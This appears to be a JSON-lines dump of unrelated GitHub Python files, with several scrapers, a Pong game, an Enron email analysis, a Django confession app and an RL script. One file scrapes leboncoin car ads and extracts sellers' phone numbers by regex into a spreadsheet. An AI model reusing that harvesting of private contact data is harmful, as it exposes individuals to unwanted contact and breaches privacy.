title=\"[COLOR azure]%s[/COLOR]\" % (scrapedtitle + \" (\" + lang_title + \")\"),\n url=data,\n thumbnail=item.thumbnail,\n extra=item.extra,\n fulltitle=scrapedtitle + \" (\" + lang_title + \")\" + ' - ' + item.show,\n show=item.show))\n\n logger.info(\"[italiaserie.py] episodios\")\n\n itemlist = []\n\n # Download pagina\n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n if 'CLICCA QUI PER GUARDARE TUTTI GLI EPISODI' in data:\n item.url = re.sub('\\-\\d+', '-links', item.url)\n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n data = scrapertools.get_match(data, '
(.*?)')\n\n lang_titles = []\n starts = []\n patron = r\"Stagione.*?ITA\"\n matches = re.compile(patron, re.IGNORECASE).finditer(data)\n for match in matches:\n season_title = match.group()\n if season_title != '':\n lang_titles.append('SUB ITA' if 'SUB' in season_title.upper() else 'ITA')\n starts.append(match.end())\n\n i = 1\n len_lang_titles = len(lang_titles)\n\n while i <= len_lang_titles:\n inizio = starts[i - 1]\n fine = starts[i] if i < len_lang_titles else -1\n\n html = data[inizio:fine]\n lang_title = lang_titles[i - 1]\n\n load_episodios(html, item, itemlist, lang_title)\n\n i += 1\n\n if config.get_library_support() and len(itemlist) != 0:\n itemlist.append(\n Item(channel=__channel__,\n title=\"Aggiungi alla libreria\",\n url=item.url,\n action=\"add_serie_to_library\",\n extra=\"episodios\",\n show=item.show))\n\n return itemlist\n\n\ndef findvideos(item):\n logger.info(\"streamondemand.italiaserie findvideos\")\n\n # Carica la pagina \n data = item.url\n\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n videoitem.title = item.title + videoitem.title\n videoitem.fulltitle = item.fulltitle\n videoitem.thumbnail = item.thumbnail\n videoitem.show = item.show\n videoitem.plot = item.plot\n videoitem.channel = __channel__\n\n return itemlist\n\ndef findepvideos(item):\n logger.info(\"streamondemand.italiaserie findepvideos\")\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n \n if 'CLICCA QUI PER GUARDARE TUTTI GLI EPISODI' in data:\n item.url = re.sub('\\-\\d+', '-links', item.url)\n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n\n data = scrapertools.find_single_match(data, item.extra)\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n server = re.sub(r'[-\\[\\]\\s]+', '', videoitem.title)\n videoitem.title = \"\".join([\"[%s] \" % (\"[COLOR orange]\" + server.capitalize() + \"[/COLOR]\"), item.title])\n videoitem.fulltitle = item.fulltitle\n videoitem.show = item.show\n videoitem.thumbnail = item.thumbnail\n videoitem.channel = __channel__\n\n return itemlist\n","repo_name":"kodirepositoryluxy/KM17_15.01.18-2","sub_path":"addons/temp/7f2aab45-9907-4492-8741-fac27e7e9ac8/channels/italiaserie.py","file_name":"italiaserie.py","file_ext":"py","file_size_in_byte":10637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74810785706","text":"'''\r\nAutor: Kilian Mayerhofer-Bollek\r\nDatum 21.7.2021\r\nEin einfaches Spiel mit tkinter\r\n'''\r\nimport tkinter as tk\r\nimport random\r\n\r\n\r\n\r\n\r\nclass Ball:\r\n def __init__(self,spielfeld,schleager):\r\n self.spielfeld = spielfeld\r\n self.schleager = schleager\r\n self.form=spielfeld.create_oval(10,10,40,40,fill='green')\r\n self.xges=random.uniform(0,0.1)\r\n self.yges=-0.1\r\n self.hit_bottom =False\r\n\r\n\r\n def abprallen(self):\r\n self.spielfeld.move(self.form,self.xges,self.yges)\r\n position=self.spielfeld.coords(self.form)\r\n if position[1]<=0:\r\n self.yges=0.1\r\n if position[3]>=400:\r\n self.hit_bottom=True\r\n if position[0]<= 0:\r\n self.xges=0.1\r\n if position[2]>=500:\r\n self.xges=-0.1\r\n if self.hit_paddle(position) == True:\r\n self.yges = -0.1\r\n self.xges = random.uniform(-1,1)\r\n\r\n\r\n def hit_paddle(self, pos):\r\n paddle_pos = self.spielfeld.coords(self.schleager.form)\r\n if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:\r\n if pos[3] >= paddle_pos[1] and pos[3] <= paddle_pos[3]:\r\n return True\r\n return False\r\n\r\n\r\nclass Schlaeger:\r\n def __init__(self,spielfeld):\r\n self.spielfeld=spielfeld\r\n self.form=spielfeld.create_rectangle(0,0,120,10,fill='black')\r\n self.spielfeld.move(self.form,200,350)\r\n self.spielfeld.bind_all('a',self.links)\r\n self.spielfeld.bind_all('d',self.rechts)\r\n self.xges=0\r\n\r\n def hinher(self):\r\n self.spielfeld.move(self.form, self.xges, 0)\r\n pos= self.spielfeld.coords(self.form)\r\n if pos[0]<= 0:\r\n self.xges=0\r\n if pos [2]>=500:\r\n self.xges=0\r\n\r\n def links(self,event):\r\n self.xges=-0.1\r\n self.yges=0\r\n\r\n def rechts(self,event):\r\n self.xges=0.1\r\n self.yges=0\r\n\r\n\r\nfenster =tk.Tk()\r\nfenster.title('Ping Pong')\r\nspielfeld=tk.Canvas(fenster, width=500, height=400, bd=0, bg ='royalblue')\r\nspielfeld.pack()\r\nSchlaeger=Schlaeger(spielfeld)\r\nBall=Ball(spielfeld,Schlaeger)\r\nwhile Ball.hit_bottom == False:\r\n Schlaeger.hinher()\r\n Ball.abprallen()\r\n fenster.update_idletasks()\r\n fenster.update()\r\n\r\nfenster.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Chia-vie/CodeRoemerland","sub_path":"Abgaben/Ping Pong_Kilian.py","file_name":"Ping Pong_Kilian.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11520318557","text":"import os\nimport numpy as np\n\n'''\nfilepath = '/data/bf312/3D-Billiard/training/'\nfilename= os.listdir(filepath)\n\nglobal_count = 0\nfor name in filename:\n new_name = str(global_count) # + '_test'\n os.rename(filepath + name, filepath + new_name)\n global_count += 1\n\nfor name in filename:\n data_name = os.listdir(filepath + name + '/')\n # print(len(data_name))\n if len(data_name) != 100:\n print(name)\n'''\n\n# 1_hinton, hinton\n\n'''\nfilepath = '/data/bf312/3D-Billiard/validation/generated_test_images_bengio/'\nfor i in range(0, 100):\n new_name = i + 100\n os.rename(filepath + str(i), filepath + str(new_name))\n'''\n\n\nfilepath = '/data/bf312/3D-Billiard/testing/'\nhinton_1_data_bbox = np.load(filepath + 'generated_test_images_1_hinton/bbox.npy')\nhinton_1_data_pres = np.load(filepath + 'generated_test_images_1_hinton/pres.npy')\nprint(hinton_1_data_bbox.shape, hinton_1_data_pres.shape)\nhinton_data_bbox = np.load(filepath + 'generated_test_images_hinton/bbox.npy')\nhinton_data_pres = np.load(filepath + 'generated_test_images_hinton/pres.npy')\nprint(hinton_data_bbox.shape, hinton_data_pres.shape)\n\n\nbbox = np.concatenate((hinton_1_data_bbox, hinton_data_bbox), axis=0)\nprint(bbox.shape)\npres = np.concatenate((hinton_1_data_pres, hinton_data_pres), axis=0)\nprint(pres.shape)\n\nnp.save('/data/bf312/3D-Billiard/testing/bbox.npy', bbox)\nnp.save('/data/bf312/3D-Billiard/testing/pres.npy', pres)\n","repo_name":"NanboLi/CLEVR-Object-Centric","sub_path":"dynamic_scene_generator/utils/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72214866028","text":"import os, sys, email, re\nimport pandas as pd\n# plotting\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\nimport wordcloud\n# Network Analysis\nimport networkx as nx\n\n# NLP\nfrom nltk.tokenize.regexp import RegexpTokenizer\nfrom sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS\n\nfrom subprocess import check_output\n\n\nclass analyse_enron:\n\n # (Analyzing 1000 emails first due to lack of memory)\n def __init__(self, size=None):\n self.size = size\n self.email_df = pd.read_csv('input/emails.csv', nrows=self.size)\n messages = list(map(email.message_from_string, self.email_df['message']))\n self.email_df.drop('message', axis=1, inplace=True)\n # Get fields from parsed email fields\n keys = messages[0].keys()\n\n for key in keys:\n self.email_df[key] = [doc[key] for doc in messages]\n # Parse content from emails\n self.email_df['content'] = list(map(self.get_text_from_email, messages))\n # split multiple email addresses\n self.email_df['From'] = self.email_df['From'].map(self.split_email_addresses)\n self.email_df['To'] = self.email_df['To'].map(self.split_email_addresses)\n\n # Extract the root of file as user\n self.email_df['user'] = self.email_df['file'].map(lambda x:x.split('/')[0])\n\n del messages\n\n def view_file_detail(self):\n\n # print(check_output(['ls', 'input/']).decode(\"utf8\"))\n # Read data into dataframe\n file_input = check_output(['ls', 'input/'].decode('utf8'))\n shape_of_emails = self.email_df.shape\n return file_input, shape_of_emails\n\n # get the names/ emails of all the workers\n def get_workers_detail(self):\n # self.parsing_mails()\n self.__init__()\n workers_names = set()\n workers_emails = set()\n for i in range(self.size):\n workers_names.add(self.email_df['X-From'][i])\n workers_emails.add(next(iter(self.email_df['From'][i])))\n workers_names = list(workers_names)\n workers_emails = list(workers_emails)\n return workers_names, workers_emails\n\n # search for emails sent by a worker in enron by just typing part of his/her name\n def get_individual_email(self, name='phillip'):\n # self.parsing_mails()\n self.__init__()\n name = name.lower()\n subjects = []\n contents = []\n for i in range(self.size):\n full_sender_name = (self.email_df['X-From'][i]).lower()\n matcher = re.search(r'\\b{}\\b'.format(name), full_sender_name)\n # print(full_sender_name)\n if matcher:\n subjects.append(self.email_df['Subject'][i])\n contents.append(self.email_df['content'][i])\n # print(self.email_df['Subject'][i])\n\n return subjects, contents\n\n # search for keywords in emails sent by particular workers for more info.\n def search_individual_email(self, name='phillip', key_word='forecast'):\n target_contents = []\n key_word = key_word.lower()\n _, contents = self.get_individual_email(name=name)\n\n # if there are really contents in the lists, then go ahead and work\n if len(contents) != 0:\n\n for content in contents:\n full_content = str(content).lower()\n key_word_matcher = re.search(r'\\b{}\\b'.format(key_word), full_content)\n if key_word_matcher:\n target_contents.append(content)\n\n return target_contents\n\n # def view_sample_mails(self, sample_id = 25):\n # self.__init__()\n # single_sample = self.email_df['message'][sample_id]\n # msg = email.message_from_string(single_sample)\n # variation = self.email_df['Subject'][sample_id]\n # # get only the content of the email\n # for part in msg.walk():\n # if part.get_content_type() == 'text/plain':\n # msg = part.get_payload()\n # return single_sample, msg, variation\n\n def get_text_from_email(self, msg):\n parts = []\n for part in msg.walk():\n if part.get_content_type() == 'text/plain':\n parts.append(part.get_payload())\n return ''.join(parts)\n\n\n def split_email_addresses(self, line):\n # separate multiple email addresses\n if line:\n addrs = line.split(',')\n addrs = frozenset(map(lambda x:x.strip(), addrs))\n else:\n addrs = None\n return addrs\n\n # successful parsing message contents and fields and demo show only the first five\n def view_parsed_mails(self,):\n # self.parsing_mails()\n self.__init__()\n parsed = self.email_df.head()\n return parsed\n\n def view_dataframe_shape(self,):\n # print('shape of dataframe: ', email_df.shape)\n # self.parsing_mails()\n self.__init__()\n for col in self.email_df.columns:\n output = col, self.email_df[col].nunique()\n # print(col, email_df[col].nunique())\n return output\n\n # Set index and drop columns with two few values\n def set_and_drop(self):\n # self.parsing_mails()\n self.__init__()\n self.email_df = self.email_df.set_index('Message-ID').drop(['file', 'Mime-Version', 'Content-Type',\n 'Content-Transfer-Encoding'], axis=1)\n return self.email_df\n\n def parse_time(self):\n self.email_df = self.set_and_drop()\n # Parse datetime\n self.email_df['Date'] = pd.to_datetime(self.email_df['Date'], infer_datetime_format=True)\n return self.email_df.dtypes\n # print(email_df.dtypes)\n\n def plot_and_view_timestamps(self):\n self.parse_time()\n # Find out when emails were sent as a plot (Years)\n ax = self.email_df.groupby(self.email_df['Date'].dt.year)['content'].count().plot()\n ax.set_xlabel('Year', fontsize=18)\n ax.set_ylabel('N emails', fontsize=18)\n plt.show()\n\n # Find out when emails were sent as a plot (Days of the week)\n ax = self.email_df.groupby(self.email_df['Date'].dt.dayofweek)['content'].count().plot()\n ax.set_xlabel('Day of week', fontsize=18)\n ax.set_ylabel('N emails', fontsize=18)\n plt.show()\n\n # Find out when emails were sent as a plot (Hours of the day)\n ax = self.email_df.groupby(self.email_df['Date'].dt.hour)['content'].count().plot()\n ax.set_xlabel('Hour', fontsize=18)\n ax.set_ylabel('N emails', fontsize=18)\n plt.show()\n\n # find out who sent the most of mails\n def subject_and_content_count(self):\n self.set_and_drop()\n # count the word in the subject and content\n tokenizer = RegexpTokenizer(r'(?u)\\b\\w\\w+\\b')\n self.email_df['subject_wc'] = self.email_df['Subject'].map(lambda x:len(tokenizer.tokenize(x)))\n self.email_df['content_wc'] = self.email_df['content'].map(lambda x:len(tokenizer.tokenize(x)))\n\n group_by_people = self.email_df.groupby('user').agg({\n 'content': 'count',\n 'subject_wc': 'mean',\n 'content_wc':'mean'\n })\n\n group_by_people.rename(columns={'content': 'N emails',\n 'subject_wc': 'Subject word count',\n 'content_wc': 'Content word count'}, inplace=True)\n\n # print(group_by_people.sort('N emails', ascending=False).head())\n return group_by_people.sort_values(by='N emails', ascending=False).head()\n\n def sns_plot(self):\n sns.pairplot(self.subject_and_content_count().reset_index(), hue='user')\n # sns.pairplot(group_by_people.reset_index(), hue='user')\n plt.show()\n\n # who sent the most emails to whom\n def email_sent_data(self):\n self.set_and_drop()\n # checking emails sent to single email addresses first, more important stuffs\n sub_df = self.email_df[['From', 'To', 'Date']].dropna()\n # print(sub_df.shape)\n\n # drop emails sent to multiple email addresses [because it might mostly contain\n # unwanted information]\n sub_df = sub_df.loc[sub_df['To'].map(len) == 1]\n # print(sub_df.shape)\n\n # actually view who sent what to who\n sub_df = sub_df.groupby(['From', 'To']).count().reset_index()\n # Unpack frozensets\n sub_df['From'] = sub_df['From'].map(lambda x: next(iter(x)))\n sub_df['To'] = sub_df['To'].map(lambda x: next(iter(x)))\n\n # rename column and print the first 10 of such email sendings\n sub_df.rename(columns={'Date': 'count'}, inplace=True)\n # print(sub_df.sort_values(by='count', ascending=False).head(10))\n return sub_df.sort_values(by='count', ascending=False).head(10), sub_df\n\n # this method enables one to know the number of emails sent by the id entered and to whom\n def tracker(self, personnel_name = None):\n processed_above = list(self.email_sent_data())\n target_contents = []\n for item in processed_above:\n full_content = str(item).lower()\n key_word_matcher = re.search(r'\\b{}\\b'.format(personnel_name), full_content)\n if key_word_matcher:\n target_contents.append(item)\n return target_contents\n\n # make a network of email senders and recipients\n def network(self):\n _, sub_df = self.email_sent_data()\n G = nx.from_pandas_dataframe(sub_df, 'From', 'To', edge_attr='count', create_using=nx.DiGraph())\n # print('Number of nodes: %d, Number of edges: %d' % (G.number_of_nodes(), G.number_of_edges()))\n return 'Number of nodes: %d, Number of edges: %d' % (G.number_of_nodes(), G.number_of_edges())\n\n def word_clouding(self):\n self.set_and_drop()\n # What the emails say in subject\n subjects = ' '.join(self.email_df['Subject'])\n fig, ax = plt.subplots(figsize=(16, 12))\n wc = wordcloud.WordCloud(width=800,\n height=600,\n max_words=200,\n stopwords=ENGLISH_STOP_WORDS).generate(subjects)\n ax.imshow(wc)\n ax.axis(\"off\")\n\n # What the emails say in content\n contents = ' '.join(self.email_df.sample(1000)['content'])\n fig, ax = plt.subplots(figsize=(16, 12))\n wc = wordcloud.WordCloud(width=800,\n height=600,\n max_words=200,\n stopwords=ENGLISH_STOP_WORDS).generate(contents)\n ax.imshow(wc)\n ax.axis(\"off\")\n\n plt.show()\n\n# testing\n\nae = analyse_enron(size=5000)\n\ntarget_contents = ae.search_individual_email(name='phillip', key_word='forecast')\ngroupee =ae.subject_and_content_count()\nif len(target_contents) == 0:\n print('No keyword matched')\nelse:\n print(ae.tracker(personnel_name='phillip'))\n\n# me, you, us = ae.view_sample_mails(sample_id=23)\n# print(you)\n\n","repo_name":"bluedistro/enron_email_analysis","sub_path":"enron_1.py","file_name":"enron_1.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19972532652","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Confession\nfrom django.contrib.auth.models import User\n#import HttpResponseRedirect\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\n# Create your views here.\ndef index(request):\n if request.user.is_authenticated:\n return redirect('profile')\n else:\n return render(request, 'app/index.html')\ndef addConfession(request, username):\n if User.objects.filter(username=username):\n print('user exists')\n if request.method == 'POST':\n user = User.objects.get(username=username)\n\n confession = request.POST['confession']\n user = user\n Confession.objects.create(confession=confession, user=user)\n return HttpResponseRedirect(request.path_info)\n messages.success(request, 'Confession sent!')\n context= {\n 'user': user\n }\n return render(request, 'app/addConfession.html', {'username': username})\n else:\n return render(request, 'app/dont.html', {'username': username})\n@login_required\ndef profile(request):\n user = request.user\n confessions = user.confessions.all().order_by('-date')\n context = {\n 'user': user,\n 'confessions': confessions\n }\n \n return render(request, 'app/profile.html', context)\n\n","repo_name":"samyogkhatiwada/says","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21386827148","text":"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport json # json.loads\n\n# --------------------------------------ENONCE ---------------------------\n# L'objectif est de générer un fichier de données sur le prix des Renault Zoé sur le marché de l'occasion\n# en Ile de France, PACA et Aquitaine.\n# Vous utiliserezleboncoin.fr comme source. Le fichier doit être propre et contenir les infos suivantes :\n# version ( il y en a 3), année, kilométrage, prix, téléphone du propriétaire, est ce que la voiture est vendue par un professionnel ou un particulier.\n# Vous ajouterez une colonne sur le prix de l'Argus du modèle que vous\n# récupérez sur ce site\n# http://www.lacentrale.fr/cote-voitures-renault-zoe--2013-.html.\n\n# Les données quanti (prix, km notamment) devront être manipulables (pas de string, pas d'unité).\n# Vous ajouterez une colonne si la voiture est plus chere ou moins chere\n# que sa cote moyenne.\n\n# ----------------------------------- APPROCHE --------------------------\n# 1) Récupération des numéros d'annonce ou adresses de pages web à aller chercher\n# https://www.leboncoin.fr/voitures/offres/ile_de_france/?th=1&q=zoe&parrot=0\n# https://www.leboncoin.fr/voitures/offres/provence_alpes_cote_d_azur/?th=1&q=zoe&parrot=0\n# https://www.leboncoin.fr/voitures/offres/aquitaine/?th=1&q=zoe&parrot=0\n\n# 2) Récupération des infos plus détaillées par annonce, sur des pages de type\n# https://www.leboncoin.fr/voitures/1035061272.htm?ca=12_s\n\n# 3) Récupération des infos sur la Centrale en deux temps... une première\n# requête donnant les différents modèles diponibles, sélection de la\n# première ligne présentée pour ouvrir page et collecter cote\n\n\n# Récupération des annonces - 3 requêtes correspondant aux 3 régions demandées\nliste_regions = {'IDF': 'ile_de_france',\n 'PACA': 'provence_alpes_cote_d_azur', 'AQU': 'aquitaine'}\nmodele = 'zoe'\nmarque = 'Renault'# majuscule puis minuscule\nversions = ['Zen','Intens','Life']\n\n# modele = 'Q5'\n# marque = 'Audi'# majuscule puis minuscule\n# versions = ['Sline','quattro','Luxe']\n\n\n\n\nliste_annonces = []\nliste_region_annonces = []\nliste_type_vendeur = []\n\nparam1 = {'th':1,'parrot':0,'brd':marque,'q':modele.lower()}\nfor region in liste_regions:\n # adresse_page = u'https://www.leboncoin.fr/voitures/offres/' + \\\n # liste_regions[region] + '/?th=1&parrot=0&fu=4&brd=' + marque + '&q=' + modele.lower()\n # whole_page = requests.get(adresse_page)\n adresse_page = u'https://www.leboncoin.fr/voitures/offres/' + liste_regions[region]\n whole_page = requests.get(adresse_page, params=param1)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n rows = soup_page.find_all(class_=\"list_item clearfix trackable\")\n\n for row in rows:\n info_glob = row.unwrap()\n liste_annonces.append(info_glob['href'])\n liste_region_annonces.append(region)\n # Récup type vendeur\n data_info = info_glob['data-info']\n pos_info = data_info.rfind('ad_offres')\n type_vendeur = \"\"\n if (pos_info > 0):\n type_vendeur = data_info[pos_info +\n 14:pos_info + 18].replace('\"', '')\n liste_type_vendeur.append(type_vendeur)\n\ndf = pd.DataFrame({'Region': liste_region_annonces, 'Site': liste_annonces, 'Type_Vendeur': liste_type_vendeur,\n 'prix': 0, 'annee': 0, 'kms': 0, 'marque': \"\", 'version': \"\", 'tel': \"\", 'Argus': 0})\n \nnum_tel = re.compile(\n \"(\\+33|0)(\\s||0|\\-)[0-9](\\.|\\s||)([0-9]{2}(\\.|\\s||\\-)){3}[0-9]{2}\")\nfor row in range(0, df.count()[0]):\n adresse_page = \"https:\" + df['Site'].ix[row]\n whole_page = requests.get(adresse_page)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n temp = soup_page.find(class_=\"item_price clearfix\").find(class_=\"value\")\n if temp != None:\n df['prix'].ix[row] = int(re.sub(\"[^0-9]\", \"\", temp.text))\n temp = soup_page.find(class_=\"value\", itemprop=\"brand\")\n if temp != None:\n df['marque'].ix[row] = temp.text\n temp = soup_page.find(class_=\"value\", itemprop=\"releaseDate\")\n if temp != None:\n df['annee'].ix[row] = int(re.sub(\"[^0-9]\", \"\", temp.text))\n temp = soup_page.find(\n class_=\"value\", itemprop=\"releaseDate\").parent.parent.nextSibling.nextSibling.find(class_=\"value\")\n if temp != None:\n df['kms'].ix[row] = int(re.sub(\"[^0-9]\", \"\", temp.text))\n \n temp = soup_page.find(class_=\"adview_header clearfix\").find(\n class_=\"no-border\")\n temp_version = re.sub(\"[^A-Za-z]\", \"\", temp.text).upper()\n version = \"\"\n for version_testee in versions:\n if re.search(version_testee.upper(), temp_version):\n version = version_testee \n df['version'].ix[row] = version\n\n # Chercher numéro de téléphone dans annonce...\n description = soup_page.find(class_=\"value\", itemprop=\"description\").text\n tel_description = re.search(num_tel, description)\n if tel_description != None:\n num_tel_brut = tel_description.string[\n tel_description.span()[0]:tel_description.span()[1]]\n num_tel_propre = re.sub('([^0-9+])', '', num_tel_brut)\n df['tel'].ix[row] = num_tel_propre\n\n# df.to_excel(\"Annonces \" + modele + \".xls\")\n# df = pd.read_excel(\"Annonces \" + modele + \".xls\")\n\n# Collecte infos La Centrale\n# http://www.lacentrale.fr/cote-voitures-renault-zoe--2015-.html\n# http://www.lacentrale.fr/cote-auto-renault-zoe-intens-2015.html\ndf1 = df.dropna(subset=['version']).reset_index()\nfor row in range(0, df1.count()[0]):\n if df1.version.ix[row] != \"\":\n adresse_page = 'http://www.lacentrale.fr/cote-voitures-' + \\\n df1.marque.ix[row].lower() + '-' + modele + '-' + df1.version.ix[row].lower() + \\\n '-' + str(df1.annee.ix[row]) + '-.html'\n whole_page = requests.get(adresse_page)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n premiere_ligne = soup_page.find(class_=\"listingResultLine f14 auto\")\n if premiere_ligne != None:\n adresse_page = 'http://www.lacentrale.fr/' + premiere_ligne.findChild()['href']\n whole_page = requests.get(adresse_page)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n temp = soup_page.find(class_=\"f24 bGrey9L txtRed pL15 mL15\")\n if temp != None:\n cote = int(re.sub('[^0-9]', \"\", temp.text))\n df1.Argus.ix[row] = cote\n\ndf1.to_excel(\"Annonces \" + modele + \".xls\")\n","repo_name":"SkatiRCI/starter-kit-datascience","sub_path":"franck-bautista/Lesson4/exo_dom_lesson_4_Leboncoin.py","file_name":"exo_dom_lesson_4_Leboncoin.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"fr","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"72192187307","text":"import argparse\n\nimport numpy as np\nimport gym\nimport torch\n\nfrom agent import VanillaPG\nfrom agent import OffPolicyPG\n\n\ndef off_policy_run(env, args):\n agent = OffPolicyPG(env, args)\n global_steps = 0\n for ep in range(args.num_ep):\n rollouts, ep_steps, ep_rewards = run_episode(env, agent)\n global_steps += ep_steps\n agent.train(rollouts)\n ep_avg_rewards = np.mean(ep_rewards)\n print(\"Ep %d reward: %.4f ep_steps: %d global_steps: %d\" % \n (ep, ep_avg_rewards, ep_steps, global_steps))\n\n\ndef on_policy_run(env, args):\n agent = VanillaPG(env, args)\n global_steps = 0\n for ep in range(args.num_ep):\n rollouts, ep_steps, ep_rewards = run_episode(env, agent)\n global_steps += ep_steps\n agent.train(rollouts)\n ep_avg_rewards = np.mean(ep_rewards)\n print(\"Ep %d reward: %.4f ep_steps: %d global_steps: %d\" % \n (ep, ep_avg_rewards, ep_steps, global_steps))\n\n\ndef on_policy_run(env, args):\n agent = VanillaPG(env, args)\n global_steps = 0\n for ep in range(args.num_ep):\n rollouts, ep_steps, ep_rewards = run_episode(env, agent)\n global_steps += ep_steps\n agent.train(rollouts)\n ep_avg_rewards = np.mean(ep_rewards)\n print(\"Ep %d reward: %.4f ep_steps: %d global_steps: %d\" % \n (ep, ep_avg_rewards, ep_steps, global_steps))\n\n\ndef main(args):\n # device\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") \n args.device = device\n # seed\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n # env and agent\n task_name = \"BipedalWalker-v2\"\n env = gym.make(task_name)\n env.seed(args.seed)\n # run\n # on_policy_run(env, args)\n off_policy_run(env, args)\n\n\ndef run_episode(env, agent):\n obs = env.reset()\n obs = preprocess(obs)\n ep_rewards, rollouts = [], []\n ep_steps = 0\n while True:\n logp, action = agent.step(obs)\n next_obs, reward, done, _ = env.step(action)\n ep_rewards.append(reward)\n next_obs = preprocess(next_obs)\n rollouts.append([obs, action, reward, logp, next_obs])\n obs = next_obs\n ep_steps += 1\n if done:\n break\n return rollouts, ep_steps, ep_rewards\n\n\ndef preprocess(obs):\n return obs.astype(np.float32)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--num_ep\", type=int, default=5000)\n parser.add_argument(\"--lr\", type=float, default=1e-2)\n parser.add_argument(\"--seed\", type=int, default=31)\n parser.add_argument(\"--gpu\", action=\"store_true\")\n main(parser.parse_args())\n","repo_name":"borgwang/reinforce_py","sub_path":"algorithms/PG/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"37"} +{"seq_id":"39889020901","text":"import json\nimport requests\n\n# api_url = f\"https://api.openaq.org/v2/measurements?date_from=2000-01-01T00%3A00%3A00%2B00%3A00&date_to=2022-09-29T15%3A10%3A00%2B00%3A00&limit=100&page=1&offset=0&sort=desc¶meter_id=2¶meter=&radius=1000&location_id={}&order_by=datetime\"\n\nwith open('location_id.json', 'r') as location_id_file:\n location_ids = json.load(location_id_file)\n\nlocation_datapoints = {}\n\nfor location, id in location_ids.items():\n api_url = f\"https://api.openaq.org/v2/measurements?date_from=2000-01-01T00%3A00%3A00%2B00%3A00&date_to=2022-09-29T15%3A10%3A00%2B00%3A00&limit=100&page=1&offset=0&sort=desc¶meter_id=2&radius=100&location_id={id}&order_by=datetime\"\n response = requests.get(api_url)\n\n response_json = response.json()\n location_datapoints[location] = response_json[\"meta\"]['found']\n\nlocations = list(location_datapoints.keys())\nsorted_datapoints = list(location_datapoints.values())\n\nfor i in range(len(sorted_datapoints)):\n for j in range(0, len(sorted_datapoints) - i - 1):\n if sorted_datapoints[j] > sorted_datapoints[j+1]:\n\n temp = sorted_datapoints[j]\n sorted_datapoints[j] = sorted_datapoints[j+1]\n sorted_datapoints[j+1] = temp\n\n temp = locations[j]\n locations[j] = locations[j+1]\n locations[j+1] = temp\n\nsorted_location_datapoints = {locations[i] : sorted_datapoints[i] for i in range(len(sorted_datapoints))}\n\nwith open('location_datapoints.json', 'w') as file:\n json.dump(sorted_location_datapoints, file)\n","repo_name":"MercMayhem/Mumbai-Air-Pollution-analysis-and-AQI-forecasting","sub_path":"location_filtering.py","file_name":"location_filtering.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2337917640","text":"#МНОЖЕСТВА:\n# d1 = {\"anton\",\"anton\", False,}\n# d1.add(5)\n# print(d1)\n# x = set()\n#СЛОВАРИ:\n# anton = \"\"\n# d = {}\n# d={anton: 1\n# }\n# print(d)\n# m = dict()\n\n# phrase =(input(\"text:\")).lower()\n# ne_dolche_milk=list(\".,?!/=+-{}[]()*^':;\")\n# for eee in phrase:\n# if eee not in ne_dolche_milk:\n# anton += eee\n# l = anton.split(\" \")\n# for discord in l:\n# if discord not in d:\n# d[discord]=1\n# else:\n# d[discord] += 1\n# print(d)\n# s = 0\n# d = {\"Хлеб\": 250,\n# \"Дольче милк\": 280,\n# \"Сырок\": 30,\n# \"Ёлка\": 50,\n# }\n# #for price in d: #перебор по ключем\n# for price in d.values(): #и по ключам\n# s += price\n# print(s)\n\n# hog_rider = max(d.values())\n# for (key, values) in d.items():\n# if values == hog_rider:\n# print(f\"kluch:{key},znachenie:{values}\")\n\ndelusion = {\n 3:2,\n 9:2,\n 1:2,\n \"KEY1\":2,\n False:2,\n \"eee\":3,}\ndelusion[\"eee\"], delusion[3] = delusion[3], delusion[\"eee\"]\n","repo_name":"Komarovdb/python","sub_path":"lesson_14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72669895786","text":"from pwn import *\nimport sys\n\nif len(sys.argv) < 2:\n\tdebug = 